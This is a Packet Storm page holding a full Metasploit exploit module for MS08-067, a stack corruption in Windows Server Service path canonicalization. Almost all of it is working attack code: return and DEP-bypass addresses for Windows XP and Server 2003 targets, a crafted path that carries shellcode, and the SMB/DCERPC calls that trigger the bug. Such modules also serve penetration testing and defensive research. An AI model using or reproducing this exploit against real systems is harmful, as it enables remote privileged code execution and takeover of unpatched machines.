This Metasploit module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This development version has been tested against Windows XP SP2 with DEP enabled.
5b5312c8605fc88ff63456e4b83a9ac3d2c49bf5ff5a44c1a5ae188155f665ba##
# $Id:$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Server Service Relative Path Stack Corruption',
'Description' => %q{
This module exploits a parsing flaw in the path canonicalization code of
NetAPI32.dll through the Server Service. This development version has
been tested against Windows XP SP2 with DEP enabled.
},
'Author' =>
[
'hdm'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5773 $',
'References' =>
[
[ 'MSB', 'MS08-067' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2 English', { 'Ret' => 0x6f88f727, 'DisableNX' => 0x6F8916E2, 'Scratch' => 0x00020408 }], # jmp esi / disablenx (acgenral.dll)
[ 'Windows XP SP3 English', { 'Ret' => 0x6f88f807, 'DisableNX' => 0x6F8917C2, 'Scratch' => 0x00020408 }], # jmp esi / disablenx (acgenral.dll)
[ 'Windows 2003 SP0 English', { 'Ret' => 0x71bf175f, 'DisableNX' => 0x71bf175f, 'Scratch' => 0x00020408 }], # jmp esi / jmp esi (ws2help.dll)
],
'DisclosureDate' => 'Oct 12 2008'))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
], self.class)
end
def exploit
# NET_API_STATUS NetprPathCanonicalize(
# [in, string, unique] SRVSVC_HANDLE ServerName,
# [in, string] WCHAR* PathName,
# [out, size_is(OutbufLen)] unsigned char* Outbuf,
# [in, range(0,64000)] DWORD OutbufLen,
# [in, string] WCHAR* Prefix,
# [in, out] DWORD* PathType,
# [in] DWORD Flags
# );
# Padding is really picky for some reason
padder = [*("A".."Z")]
pad = "A"
while(pad.length < 7)
c = padder[rand(padder.length)]
next if pad.index(c)
pad += c
end
prefix = ""
server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[04,4] = [target.ret].pack("V") # jmp esi
jumper[58,2] = "\xeb\x62"
path =
Rex::Text.to_unicode("\\") +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Shellcode
payload.encoded +
# Relative path to trigger the bug
Rex::Text.to_unicode("\\..\\..\\") +
# Extra padding
Rex::Text.to_unicode(pad) +
# Writable memory location (static)
[target['Scratch']].pack("V") + # EBP
# NS_DisableNX::g_szCommandLine() FTW (acgenral.dll)
[target['DisableNX']].pack("V") +
# Padding with embedded jump
jumper +
# NULL termination
"\x00" * 2
connect()
smb_login()
handle = dcerpc_handle(
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
stub =
NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(rand(1024)) +
NDR.wstring("") +
NDR.long(4097) +
NDR.long(0)
begin
print_status("Triggering the vulnerability...")
dcerpc.call(0x1f, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
rescue => e
if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
raise e
end
end
# Cleanup
handler
disconnect
end
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed